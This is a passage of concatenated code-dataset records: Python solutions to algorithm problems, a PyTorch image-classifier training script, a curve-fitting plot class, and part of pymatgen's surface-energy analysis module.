2\n\n result = 1 1 1\n\n Time complexity: O(n)\n Space complexity: O(n + k)\n\n \"\"\"\n\n if not nums or not k or k == 0:\n return []\n\n if k == 1:\n return nums\n\n len_nums = len(nums)\n dq = deque()\n result = list()\n\n for i in range(len_nums):\n if dq and dq[0] <= i - k: # 2 <= 3 - 2\n dq.popleft()\n while dq and nums[dq[-1]] <= nums[i]: #\n dq.pop()\n dq.append(i) # index 2\n # value 1\n if i >= k - 1: # 1 >= 1\n result.append(nums[dq[0]])\n\n return result # [1, 1, 1]\n","repo_name":"flowant/practicePython","sub_path":"answers/239. Sliding Window Maximum.py","file_name":"239. Sliding Window Maximum.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18785527219","text":"# https://www.spoj.com/problems/PRIME1/\n\ndef prime2(start, end):\n res = []\n a = [False] * 2 + [True] * (end - 1)\n # print(a, len(a))\n for (n, isprime) in enumerate(a):\n if isprime:\n if not n < start:\n # yield n\n res.append(n)\n for i in range(n*n, end+1 , n):\n a[i] = False\n return res\n#\n#\n# tescase = int(input())\n# while tescase > 0:\n# start,end = map(int,input().split(' '))\n# for item in prime2(start, end):\n# print(item)\n# tescase -= 1\n\nimport math\n\ndef prime_sieve(n):\n \"\"\"Use the Sieve of Eratosthenes to list primes 0 to n.\"\"\"\n primes = list(range(n+1))\n primes[1] = 0\n for i in range(4, n+1, 2):\n primes[i] = 0\n for x in range(3, int(math.sqrt(n))+1, 2):\n if primes[x]:\n for i in range(2*primes[x], n+1, primes[x]):\n primes[i] = 0\n return filter(None, primes)\n\ndef ranged_primes(x, y):\n \"\"\"List primes between x and y.\"\"\"\n # primes = prime_sieve(int(math.sqrt(y)))\n # print(list(primes))\n primes = prime2(x,int(math.sqrt(y)))\n print(primes)\n return [n for n in range(x, y) if all(n % p for p in primes)]\n\nprint(ranged_primes(0, 100))","repo_name":"shivam0071/exploringPython","sub_path":"Competitive Programming/SPOJ/PRIME1.py","file_name":"PRIME1.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"16911097555","text":"# Imports\nimport torch, torchvision, numpy as np, matplotlib.pyplot as plt\nfrom torch import nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torchvision import transforms, datasets, models\nfrom torch.utils.data import DataLoader\nimport time\nimport copy\nfrom PIL import Image\n\nimport argparse\nimport json\n\n\ndef get_input_args():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('data_dir', type=str, help='path to the folder containing the images')\n # options\n parser.add_argument('--save_dir', type = str, default='', help = 'path to the folder for saving the model checkpoint')\n parser.add_argument('--arch', type = str, default = 'vgg16', help = 'architecture of the CNN')\n parser.add_argument('--learning_rate', type = float, default = 0.001, help = 'learning rate for training the model')\n parser.add_argument('--hidden_units', type = int, default = 512, help = 'number of hidden units for the classifier')\n parser.add_argument('--epochs', type = int, default = 20, help = 'number of epochs for training the model')\n parser.add_argument('--gpu', action='store_true', default = False, help = 'to enable gpu')\n\n return parser.parse_args()\n\n\ndef train_model(model, criterion, optimizer, num_epochs, gpu, train_dataloader, valid_dataloader):\n\n # use dropout\n model.train()\n\n # GPU or CPU\n if gpu and torch.cuda.is_available():\n model.cuda()\n else:\n model.cpu()\n \n total_step = len(train_dataloader)\n \n # Iterate over each epoch\n for epoch in range(num_epochs):\n train_loss = 0\n \n # Iterate over each image\n for step, (inputs, labels) in enumerate(train_dataloader):\n if gpu and torch.cuda.is_available():\n inputs = Variable(inputs.float().cuda())\n labels = Variable(labels.long().cuda()) \n else:\n inputs = Variable(inputs)\n labels = Variable(labels) \n \n # Forward pass\n optimizer.zero_grad()\n outputs = model.forward(inputs)\n loss = criterion(outputs, labels)\n \n # Backward prop\n loss.backward()\n optimizer.step() \n train_loss += loss.item()\n\n # Calculate validation loss\n if (step+1) % 50 == 0:\n valid_loss, valid_acc = valid_model(model, criterion, gpu, valid_dataloader)\n print ('Epoch [{}/{}] '.format(epoch+1, num_epochs),\n 'Step [{}/{}] '.format(step+1, total_step),\n 'Train Loss: {:.3f}'.format(train_loss),\n 'Valid Loss: {:.3f}'.format(valid_loss),\n 'Valid Accuracy: {:.3f}'.format(valid_acc))\n\n\ndef valid_model(model, criterion, gpu, valid_dataloader):\n \n # no dropout\n model.eval()\n \n valid_loss = 0\n valid_acc = 0\n \n n_valid_imgs = len(valid_dataloader)\n \n # Iterate over each image\n for inputs, labels in iter(valid_dataloader):\n if gpu and torch.cuda.is_available():\n inputs = Variable(inputs.float().cuda())\n labels = Variable(labels.long().cuda()) \n else:\n inputs = Variable(inputs)\n labels = Variable(labels) \n \n # Forward pass\n outputs = model.forward(inputs)\n loss = criterion(outputs, labels)\n\n # update loss\n valid_loss += loss.item()\n \n # update accuracy\n ps = torch.exp(outputs).data \n equality = (labels.data == ps.max(1)[1])\n valid_acc += equality.type_as(torch.FloatTensor()).mean()\n \n return valid_loss/n_valid_imgs, valid_acc/n_valid_imgs\n\n\ndef main():\n\n # get arguments from command line\n args = get_input_args()\n\n\n # load data\n data_dir = args.data_dir\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n\n # Define transforms for the training, validation, and testing sets\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n valid_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n test_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n # Load the datasets with ImageFolder\n train_dataset = datasets.ImageFolder(train_dir, train_transform)\n valid_dataset = datasets.ImageFolder(valid_dir, valid_transform)\n test_dataset = datasets.ImageFolder(test_dir, test_transform)\n\n # Using the image datasets and the tranforms, define the dataloaders\n train_dataloader = DataLoader(train_dataset, batch_size=64)\n valid_dataloader = DataLoader(valid_dataset, batch_size=64)\n test_dataloader = DataLoader(test_dataset, batch_size=64)\n\n\n # Load the pre-trained network\n model = getattr(models, args.arch)(pretrained=True)\n\n # freeze weights of pre-trained network\n for param in model.parameters():\n param.requires_grad = False\n\n # get label mapping\n with open('cat_to_name.json', 'r') as f:\n cat_to_name = json.load(f)\n\n # get number of input units for the classifier\n input_units = model.classifier[0].in_features\n\n # Define a new, untrained feed-forward network\n classifier = nn.Sequential(\n nn.Linear(in_features=input_units, out_features=args.hidden_units, bias=True),\n nn.ReLU(),\n nn.Dropout(p=0.25),\n nn.Linear(in_features=args.hidden_units, out_features=len(cat_to_name), bias=True)\n )\n model.classifier = classifier\n\n # get Hyper-parameters from command line args\n num_epochs = args.epochs\n learning_rate = args.learning_rate\n criterion = nn.CrossEntropyLoss()\n gpu = args.gpu\n optimizer = optim.SGD(model.classifier.parameters(), lr=learning_rate)\n\n # train model\n train_model(model, criterion, optimizer, num_epochs, gpu, train_dataloader, valid_dataloader)\n\n # save model\n checkpoint_filename = args.save_dir + 'model_checkpoint.pth'\n model.class_to_idx = train_dataset.class_to_idx\n checkpoint = {'model': model,\n 'optimizer': optimizer,\n 'class_to_idx': model.class_to_idx,\n 'model_state_dict': model.state_dict(), \n 'optimizer_state_dict': optimizer.state_dict(), \n }\n torch.save(checkpoint, checkpoint_filename)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"vinny-palumbo/PyTorch-Image-Classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15166896015","text":"from train_curveadj_fuzzynet import CurveAdjFuzzyNet\nfrom matplotlib.pyplot import subplots\n\nclass PlotCurveAdjFuzzyNet(CurveAdjFuzzyNet):\n def __init__(\n self,\n population_size: int,\n tournament_size: float,\n n_generations: int,\n range_considered,\n mutation_allowed: bool,\n **kwargs\n ) -> None:\n \n super().__init__(population_size, tournament_size, n_generations, range_considered, mutation_allowed)\n\n self.fig, self.axes = subplots(nrows=1, ncols=2, **kwargs)\n self.func_x, self.func_y = [], []\n\n\n def plot_curves(self, i: int, **kwargs) -> None:\n self.axes[0].clear()\n self.axes[0].plot(self.actual_values, color='blue')\n\n func_with_coef = self.function_to_eval(self.func_string, self.top_winners[i])\n est_curve = self.curve_values(func_with_coef)\n \n self.axes[0].plot(est_curve, **kwargs)\n self.axes[0].set_ylim(top=max(self.actual_values)*1.1)\n\n self.axes[0].set_title(\"Curva real vs estimada\")\n\n\n def plot_error(self, i: int) -> None:\n min_error, max_error = self.top_errors[-1], self.top_errors[0]\n top_error = self.top_errors[i]\n\n self.func_x.append(i)\n self.func_y.append(top_error)\n\n self.axes[1].clear()\n \n error = f'Gen #{str(i+1).zfill(3)} error: {top_error:.2f}'\n self.axes[1].set_title(error)\n # self.axes[1].set_xlim([0, self.n_gen])\n self.axes[1].set_ylim([min_error*0.9, max_error*1.1])\n\n self.axes[1].plot(self.func_x, self.func_y, color='blue')\n\n\n def plot_curveadj(self, i, **kwargs) -> None:\n self.plot_curves(i, **kwargs)\n self.plot_error(i)\n","repo_name":"Afroefras/UAG_MCC","sub_path":"inteligencia_artificial/curveadj_fuzzynet/plot_curveadj_fuzzynet.py","file_name":"plot_curveadj_fuzzynet.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29291082718","text":"\"\"\"\nThis module defines tools to analyze surface and adsorption related\nquantities as well as related plots. If you use this module, please\nconsider citing the following works::\n\n R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,\n S. P. Ong, \"Surface Energies of Elemental Crystals\", Scientific\n Data, 2016, 3:160080, doi: 10.1038/sdata.2016.80.\n\n and\n\n Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale\n stabilization of sodium oxides: Implications for Na-O2 batteries.\n Nano Letters, 14(2), 1016-1020. https://doi.org/10.1021/nl404557w\n\n and\n\n Montoya, J. H., & Persson, K. A. (2017). A high-throughput framework\n for determining adsorption energies on solid surfaces. Npj\n Computational Materials, 3(1), 14.\n https://doi.org/10.1038/s41524-017-0017-z\n\nTodo:\n- Still assumes individual elements have their own chempots\n in a molecular adsorbate instead of considering a single\n chempot for a single molecular adsorbate. E.g. for an OH\n adsorbate, the surface energy is a function of delu_O and\n delu_H instead of delu_OH\n- Need a method to automatically get chempot range when\n dealing with non-stoichiometric slabs\n- Simplify the input for SurfaceEnergyPlotter such that the\n user does not need to generate a dict\n\"\"\"\n\nfrom __future__ import annotations\n\nimport copy\nimport itertools\nimport random\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sympy import Symbol\nfrom sympy.solvers import linsolve, solve\n\nfrom pymatgen.analysis.wulff import WulffShape\nfrom pymatgen.core import Structure\nfrom pymatgen.core.composition import Composition\nfrom pymatgen.core.surface import get_slab_regions\nfrom pymatgen.entries.computed_entries import ComputedStructureEntry\nfrom pymatgen.io.vasp.outputs import Locpot, Outcar\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\nfrom pymatgen.util.due import Doi, due\nfrom pymatgen.util.plotting import pretty_plot\n\nEV_PER_ANG2_TO_JOULES_PER_M2 = 16.0217656\n\n__author__ = \"Richard Tran\"\n__credits__ = \"Joseph Montoya, Xianguo Li\"\n\n\nclass SlabEntry(ComputedStructureEntry):\n \"\"\"\n A ComputedStructureEntry object encompassing all data relevant to a\n slab for analyzing surface thermodynamics.\n\n Attributes:\n miller_index (tuple): Miller index of plane parallel to surface.\n label (str): Brief description for this slab.\n adsorbates (list): List of ComputedStructureEntry for the types of adsorbates.\n clean_entry (SlabEntry): SlabEntry for the corresponding clean slab for an adsorbed slab.\n ads_entries_dict (dict): Dictionary where the key is the reduced composition of the\n adsorbate entry and value is the entry itself.\n \"\"\"\n\n def __init__(\n self,\n structure,\n energy,\n miller_index,\n correction=0.0,\n parameters=None,\n data=None,\n entry_id=None,\n label=None,\n adsorbates=None,\n clean_entry=None,\n marker=None,\n color=None,\n ):\n \"\"\"\n Make a SlabEntry containing all relevant surface thermodynamics data.\n\n Args:\n structure (Slab): The primary slab associated with this entry.\n energy (float): Energy from total energy calculation\n miller_index (tuple(h, k, l)): Miller index of plane parallel\n to surface\n correction (float): See ComputedSlabEntry\n parameters (dict): See ComputedSlabEntry\n data (dict): See ComputedSlabEntry\n entry_id (obj): See ComputedSlabEntry\n data (dict): See ComputedSlabEntry\n entry_id (str): See ComputedSlabEntry\n label (str): Any particular label for this slab, e.g. \"Tasker 2\",\n \"non-stoichiometric\", \"reconstructed\"\n adsorbates ([ComputedStructureEntry]): List of reference entries\n for the adsorbates on the slab, can be an isolated molecule\n (e.g. O2 for O or O2 adsorption), a bulk structure (eg. fcc\n Cu for Cu adsorption) or anything.\n clean_entry (ComputedStructureEntry): If the SlabEntry is for an\n adsorbed slab, this is the corresponding SlabEntry for the\n clean slab\n marker (str): Custom marker for gamma plots (\"--\" and \"-\" are typical)\n color (str or rgba): Custom color for gamma plots\n \"\"\"\n self.miller_index = miller_index\n self.label = label\n self.adsorbates = adsorbates if adsorbates else []\n self.clean_entry = clean_entry\n self.ads_entries_dict = {str(next(iter(ads.composition.as_dict()))): ads for ads in self.adsorbates}\n self.mark = marker\n self.color = color\n\n super().__init__(\n structure,\n energy,\n correction=correction,\n parameters=parameters,\n data=data,\n entry_id=entry_id,\n )\n\n def as_dict(self):\n \"\"\"Returns dict which contains Slab Entry data.\"\"\"\n dct = {\"@module\": type(self).__module__, \"@class\": type(self).__name__}\n dct[\"structure\"] = self.structure\n dct[\"energy\"] = self.energy\n dct[\"miller_index\"] = self.miller_index\n dct[\"label\"] = self.label\n dct[\"adsorbates\"] = self.adsorbates\n dct[\"clean_entry\"] = self.clean_entry\n\n return dct\n\n def gibbs_binding_energy(self, eads=False):\n \"\"\"\n Returns the adsorption energy or Gibbs binding energy of an adsorbate on a surface.\n\n Args:\n eads (bool): Whether to calculate the adsorption energy\n (True) or the binding energy (False) which is just\n adsorption energy normalized by number of adsorbates.\n \"\"\"\n n = self.get_unit_primitive_area\n n_ads = self.Nads_in_slab\n\n BE = (self.energy - n * self.clean_entry.energy) / n_ads - sum(ads.energy_per_atom for ads in self.adsorbates)\n return BE * n_ads if eads else BE\n\n def surface_energy(self, ucell_entry, ref_entries=None):\n \"\"\"\n Calculates the surface energy of this SlabEntry.\n\n Args:\n ucell_entry (entry): An entry object for the bulk\n ref_entries (list: [entry]): A list of entries for each type\n of element to be used as a reservoir for non-stoichiometric\n systems. The length of this list MUST be n-1 where n is the\n number of different elements in the bulk entry. The chempot\n of the element ref_entry that is not in the list will be\n treated as a variable.\n\n Returns (Add (Sympy class)): Surface energy\n \"\"\"\n # Set up\n ref_entries = ref_entries if ref_entries else []\n\n # Check if appropriate ref_entries are present if the slab is non-stoichiometric\n # TODO: There should be a way to identify which specific species are\n # non-stoichiometric relative to the others in systems with more than 2 species\n slab_comp = self.composition.as_dict()\n ucell_entry_comp = ucell_entry.composition.reduced_composition.as_dict()\n slab_clean_comp = Composition({el: slab_comp[el] for el in ucell_entry_comp})\n if slab_clean_comp.reduced_composition != ucell_entry.composition.reduced_composition:\n list_els = [next(iter(entry.composition.as_dict())) for entry in ref_entries]\n if not any(el in list_els for el in ucell_entry.composition.as_dict()):\n warnings.warn(\"Elemental references missing for the non-dopant species.\")\n\n gamma = (Symbol(\"E_surf\") - Symbol(\"Ebulk\")) / (2 * Symbol(\"A\"))\n ucell_comp = ucell_entry.composition\n ucell_reduced_comp = ucell_comp.reduced_composition\n ref_entries_dict = {str(next(iter(ref.composition.as_dict()))): ref for ref in ref_entries}\n ref_entries_dict.update(self.ads_entries_dict)\n\n # Calculate Gibbs free energy of the bulk per unit formula\n gibbs_bulk = ucell_entry.energy / ucell_comp.get_integer_formula_and_factor()[1]\n\n # First we get the contribution to the bulk energy\n # from each element with an existing ref_entry.\n bulk_energy, gbulk_eqn = 0, 0\n for el, ref in ref_entries_dict.items():\n N, delu = self.composition.as_dict()[el], Symbol(f\"delu_{el}\")\n if el in ucell_comp.as_dict():\n gbulk_eqn += ucell_reduced_comp[el] * (delu + ref.energy_per_atom)\n bulk_energy += N * (Symbol(\"delu_\" + el) + ref.energy_per_atom)\n\n # Next, we add the contribution to the bulk energy from\n # the variable element (the element without a ref_entry),\n # as a function of the other elements\n for ref_el in ucell_comp.as_dict():\n if str(ref_el) not in ref_entries_dict:\n break\n ref_e_per_a = (gibbs_bulk - gbulk_eqn) / ucell_reduced_comp.as_dict()[ref_el]\n bulk_energy += self.composition.as_dict()[ref_el] * ref_e_per_a\n se = gamma.subs(\n {\n Symbol(\"E_surf\"): self.energy,\n Symbol(\"Ebulk\"): bulk_energy,\n Symbol(\"A\"): self.surface_area,\n }\n )\n\n return float(se) if type(se).__name__ == \"Float\" else se\n\n @property\n def get_unit_primitive_area(self):\n \"\"\"\n Returns the surface area of the adsorbed system per\n unit area of the primitive slab system.\n \"\"\"\n A_ads = self.surface_area\n A_clean = self.clean_entry.surface_area\n return A_ads / A_clean\n\n @property\n def get_monolayer(self):\n \"\"\"\n Returns the primitive unit surface area density of the\n adsorbate.\n \"\"\"\n unit_a = self.get_unit_primitive_area\n n_surfs = self.Nsurfs_ads_in_slab\n n_ads = self.Nads_in_slab\n return n_ads / (unit_a * n_surfs)\n\n @property\n def Nads_in_slab(self):\n \"\"\"Returns the TOTAL number of adsorbates in the slab on BOTH sides.\"\"\"\n return sum(self.composition.as_dict()[a] for a in self.ads_entries_dict)\n\n @property\n def Nsurfs_ads_in_slab(self):\n \"\"\"Returns the TOTAL number of adsorbed surfaces in the slab.\"\"\"\n struct = self.structure\n weights = [s.species.weight for s in struct]\n center_of_mass = np.average(struct.frac_coords, weights=weights, axis=0)\n\n n_surfs = 0\n # Are there adsorbates on top surface?\n if any(\n site.species_string in self.ads_entries_dict for site in struct if site.frac_coords[2] > center_of_mass[2]\n ):\n n_surfs += 1\n # Are there adsorbates on bottom surface?\n if any(\n site.species_string in self.ads_entries_dict for site in struct if site.frac_coords[2] < center_of_mass[2]\n ):\n n_surfs += 1\n\n return n_surfs\n\n @classmethod\n def from_dict(cls, dct):\n \"\"\"Returns a SlabEntry by reading in an dictionary.\"\"\"\n structure = SlabEntry.from_dict(dct[\"structure\"])\n energy = SlabEntry.from_dict(dct[\"energy\"])\n miller_index = dct[\"miller_index\"]\n label = dct[\"label\"]\n adsorbates = dct[\"adsorbates\"]\n clean_entry = dct[\"clean_entry\"]\n\n return cls(\n structure,\n energy,\n miller_index,\n label=label,\n adsorbates=adsorbates,\n clean_entry=clean_entry,\n )\n\n @property\n def surface_area(self):\n \"\"\"Calculates the surface area of the slab.\"\"\"\n m = self.structure.lattice.matrix\n return np.linalg.norm(np.cross(m[0], m[1]))\n\n @property\n def cleaned_up_slab(self):\n \"\"\"Returns a slab with the adsorbates removed.\"\"\"\n ads_strs = list(self.ads_entries_dict)\n cleaned = self.structure.copy()\n cleaned.remove_species(ads_strs)\n return cleaned\n\n @property\n def create_slab_label(self):\n \"\"\"Returns a label (str) for this particular slab based on composition, coverage and Miller index.\"\"\"\n if \"label\" in self.data:\n return self.data[\"label\"]\n\n label = str(self.miller_index)\n ads_strs = list(self.ads_entries_dict)\n\n cleaned = self.cleaned_up_slab\n label += f\" {cleaned.composition.reduced_composition}\"\n\n if self.adsorbates:\n for ads in ads_strs:\n label += f\"+{ads}\"\n label += f\", {self.get_monolayer:.3f} ML\"\n return label\n\n @classmethod\n def from_computed_structure_entry(\n cls, entry, miller_index, label=None, adsorbates=None, clean_entry=None, **kwargs\n ):\n \"\"\"Returns SlabEntry from a ComputedStructureEntry.\"\"\"\n return cls(\n entry.structure,\n entry.energy,\n miller_index,\n label=label,\n adsorbates=adsorbates,\n clean_entry=clean_entry,\n **kwargs,\n )\n\n\nclass SurfaceEnergyPlotter:\n \"\"\"\n A class used for generating plots to analyze the thermodynamics of surfaces\n of a material. Produces stability maps of different slab configurations,\n phases diagrams of two parameters to determine stability of configurations\n (future release), and Wulff shapes.\n\n Attributes:\n all_slab_entries (dict | list): Either a list of SlabEntry objects (note for a list, the\n SlabEntry must have the adsorbates and clean_entry parameter plugged in) or a Nested\n dictionary containing a list of entries for slab calculations as\n items and the corresponding Miller index of the slab as the key.\n To account for adsorption, each value is a sub-dictionary with the\n entry of a clean slab calculation as the sub-key and a list of\n entries for adsorption calculations as the sub-value. The sub-value\n can contain different adsorption configurations such as a different\n site or a different coverage, however, ordinarily only the most stable\n configuration for a particular coverage will be considered as the\n function of the adsorbed surface energy has an intercept dependent on\n the adsorption energy (ie an adsorption site with a higher adsorption\n energy will always provide a higher surface energy than a site with a\n lower adsorption energy). An example parameter is provided:\n {(h1,k1,l1): {clean_entry1: [ads_entry1, ads_entry2, ...], clean_entry2: [...], ...}, (h2,k2,l2): {...}}\n where clean_entry1 can be a pristine surface and clean_entry2 can be a\n reconstructed surface while ads_entry1 can be adsorption at site 1 with\n a 2x2 coverage while ads_entry2 can have a 3x3 coverage. If adsorption\n entries are present (i.e. if all_slab_entries[(h,k,l)][clean_entry1]), we\n consider adsorption in all plots and analysis for this particular facet.\n color_dict (dict): Dictionary of colors (r,g,b,a) when plotting surface energy stability.\n The keys are individual surface entries where clean surfaces have a solid color while\n the corresponding adsorbed surface will be transparent.\n ucell_entry (ComputedStructureEntry): ComputedStructureEntry of the bulk reference for\n this particular material.\n ref_entries (list): List of ComputedStructureEntries to be used for calculating chemical potential.\n facet_color_dict (dict): Randomly generated dictionary of colors associated with each facet.\n \"\"\"\n\n def __init__(self, all_slab_entries, ucell_entry, ref_entries=None):\n \"\"\"\n Object for plotting surface energy in different ways for clean and\n adsorbed surfaces.\n\n Args:\n all_slab_entries (dict or list): Dictionary or list containing\n all entries for slab calculations. See attributes.\n ucell_entry (ComputedStructureEntry): ComputedStructureEntry\n of the bulk reference for this particular material.\n ref_entries ([ComputedStructureEntries]): A list of entries for\n each type of element to be used as a reservoir for\n non-stoichiometric systems. The length of this list MUST be\n n-1 where n is the number of different elements in the bulk\n entry. The bulk energy term in the grand surface potential can\n be defined by a summation of the chemical potentials for each\n element in the system. As the bulk energy is already provided,\n one can solve for one of the chemical potentials as a function\n of the other chemical potentials and bulk energy. i.e. there\n are n-1 variables (chempots). e.g. if your ucell_entry is for\n LiFePO4 than your ref_entries should have an entry for Li, Fe,\n and P if you want to use the chempot of O as the variable.\n \"\"\"\n self.ucell_entry = ucell_entry\n self.ref_entries = ref_entries\n self.all_slab_entries = (\n all_slab_entries if type(all_slab_entries).__name__ == \"dict\" else entry_dict_from_list(all_slab_entries)\n )\n self.color_dict = self.color_palette_dict()\n\n se_dict, as_coeffs_dict = {}, {}\n for hkl in self.all_slab_entries:\n for clean in self.all_slab_entries[hkl]:\n se = clean.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)\n if type(se).__name__ == \"float\":\n se_dict[clean] = se\n as_coeffs_dict[clean] = {1: se}\n else:\n se_dict[clean] = se\n as_coeffs_dict[clean] = se.as_coefficients_dict()\n for dope in self.all_slab_entries[hkl][clean]:\n se = dope.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)\n if type(se).__name__ == \"float\":\n se_dict[dope] = se\n as_coeffs_dict[dope] = {1: se}\n else:\n se_dict[dope] = se\n as_coeffs_dict[dope] = se.as_coefficients_dict()\n self.surfe_dict = se_dict\n self.as_coeffs_dict = as_coeffs_dict\n\n list_of_chempots = []\n for v in self.as_coeffs_dict.values():\n if type(v).__name__ == \"float\":\n continue\n for du in v:\n if du not in list_of_chempots:\n list_of_chempots.append(du)\n self.list_of_chempots = list_of_chempots\n\n def get_stable_entry_at_u(\n self,\n miller_index,\n delu_dict=None,\n delu_default=0,\n no_doped=False,\n no_clean=False,\n ):\n \"\"\"\n Returns the entry corresponding to the most stable slab for a particular\n facet at a specific chempot. We assume that surface energy is constant\n so all free variables must be set with delu_dict, otherwise they are\n assumed to be equal to delu_default.\n\n Args:\n miller_index ((h,k,l)): The facet to find the most stable slab in\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n no_doped (bool): Consider stability of clean slabs only.\n no_clean (bool): Consider stability of doped slabs only.\n\n Returns:\n SlabEntry, surface_energy (float)\n \"\"\"\n all_delu_dict = self.set_all_variables(delu_dict, delu_default)\n\n def get_coeffs(e):\n coeffs = []\n for du in all_delu_dict:\n if type(self.as_coeffs_dict[e]).__name__ == \"float\":\n coeffs.append(self.as_coeffs_dict[e])\n elif du in self.as_coeffs_dict[e]:\n coeffs.append(self.as_coeffs_dict[e][du])\n else:\n coeffs.append(0)\n return np.array(coeffs)\n\n all_entries, all_coeffs = [], []\n for entry in self.all_slab_entries[miller_index]:\n if not no_clean:\n all_entries.append(entry)\n all_coeffs.append(get_coeffs(entry))\n if not no_doped:\n for ads_entry in self.all_slab_entries[miller_index][entry]:\n all_entries.append(ads_entry)\n all_coeffs.append(get_coeffs(ads_entry))\n\n du_vals = np.array(list(all_delu_dict.values()))\n all_gamma = list(np.dot(all_coeffs, du_vals.T))\n\n return all_entries[all_gamma.index(min(all_gamma))], float(min(all_gamma))\n\n def wulff_from_chempot(\n self,\n delu_dict=None,\n delu_default=0,\n symprec=1e-5,\n no_clean=False,\n no_doped=False,\n ):\n \"\"\"\n Method to get the Wulff shape at a specific chemical potential.\n\n Args:\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n symprec (float): See WulffShape.\n no_doped (bool): Consider stability of clean slabs only.\n no_clean (bool): Consider stability of doped slabs only.\n\n Returns:\n WulffShape: The WulffShape at u_ref and u_ads.\n \"\"\"\n latt = SpacegroupAnalyzer(self.ucell_entry.structure).get_conventional_standard_structure().lattice\n\n miller_list = list(self.all_slab_entries)\n e_surf_list = []\n for hkl in miller_list:\n # For all configurations, calculate surface energy as a\n # function of u. Use the lowest surface energy (corresponds\n # to the most stable slab termination at that particular u)\n gamma = self.get_stable_entry_at_u(\n hkl,\n delu_dict=delu_dict,\n delu_default=delu_default,\n no_clean=no_clean,\n no_doped=no_doped,\n )[1]\n e_surf_list.append(gamma)\n\n return WulffShape(latt, miller_list, e_surf_list, symprec=symprec)\n\n def area_frac_vs_chempot_plot(\n self,\n ref_delu: Symbol,\n chempot_range: list[float],\n delu_dict: dict[Symbol, float] | None = None,\n delu_default: float = 0,\n increments: int = 10,\n no_clean: bool = False,\n no_doped: bool = False,\n ) -> plt.Axes:\n \"\"\"\n 1D plot. Plots the change in the area contribution\n of each facet as a function of chemical potential.\n\n Args:\n ref_delu (Symbol): The free variable chempot with the format:\n Symbol(\"delu_el\") where el is the name of the element.\n chempot_range (list[float]): Min/max range of chemical potential to plot along.\n delu_dict (dict[Symbol, float]): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials.\n increments (int): Number of data points between min/max or point\n of intersection. Defaults to 10 points.\n no_clean (bool): Some parameter, description missing.\n no_doped (bool): Some parameter, description missing.\n\n Returns:\n plt.Axes: Plot of area frac on the Wulff shape for each facet vs chemical potential.\n \"\"\"\n delu_dict = delu_dict or {}\n chempot_range = sorted(chempot_range)\n all_chempots = np.linspace(min(chempot_range), max(chempot_range), increments)\n\n # initialize a dictionary of lists of fractional areas for each hkl\n hkl_area_dict: dict[tuple[int, int, int], list[float]] = {}\n for hkl in self.all_slab_entries:\n hkl_area_dict[hkl] = []\n\n # Get plot points for each Miller index\n for u in all_chempots:\n delu_dict[ref_delu] = u\n wulff_shape = self.wulff_from_chempot(\n delu_dict=delu_dict,\n no_clean=no_clean,\n no_doped=no_doped,\n delu_default=delu_default,\n )\n\n for hkl in wulff_shape.area_fraction_dict:\n hkl_area_dict[hkl].append(wulff_shape.area_fraction_dict[hkl])\n\n # Plot the area fraction vs chemical potential for each facet\n ax = pretty_plot(width=8, height=7)\n\n for hkl in self.all_slab_entries:\n clean_entry = next(iter(self.all_slab_entries[hkl]))\n # Ignore any facets that never show up on the\n # Wulff shape regardless of chemical potential\n if all(a == 0 for a in hkl_area_dict[hkl]):\n continue\n plt.plot(\n all_chempots,\n hkl_area_dict[hkl],\n \"--\",\n color=self.color_dict[clean_entry],\n label=str(hkl),\n )\n\n # Make the figure look nice\n ax.set(ylabel=r\"Fractional area $A^{Wulff}_{hkl}/A^{Wulff}$\")\n self.chempot_plot_addons(\n ax,\n chempot_range,\n str(ref_delu).split(\"_\")[1],\n rect=[-0.0, 0, 0.95, 1],\n pad=5,\n ylim=[0, 1],\n )\n\n return ax\n\n def get_surface_equilibrium(self, slab_entries, delu_dict=None):\n \"\"\"\n Takes in a list of SlabEntries and calculates the chemical potentials\n at which all slabs in the list coexists simultaneously. Useful for\n building surface phase diagrams. Note that to solve for x equations\n (x slab_entries), there must be x free variables (chemical potentials).\n Adjust delu_dict as need be to get the correct number of free variables.\n\n Args:\n slab_entries (array): The coefficients of the first equation\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: 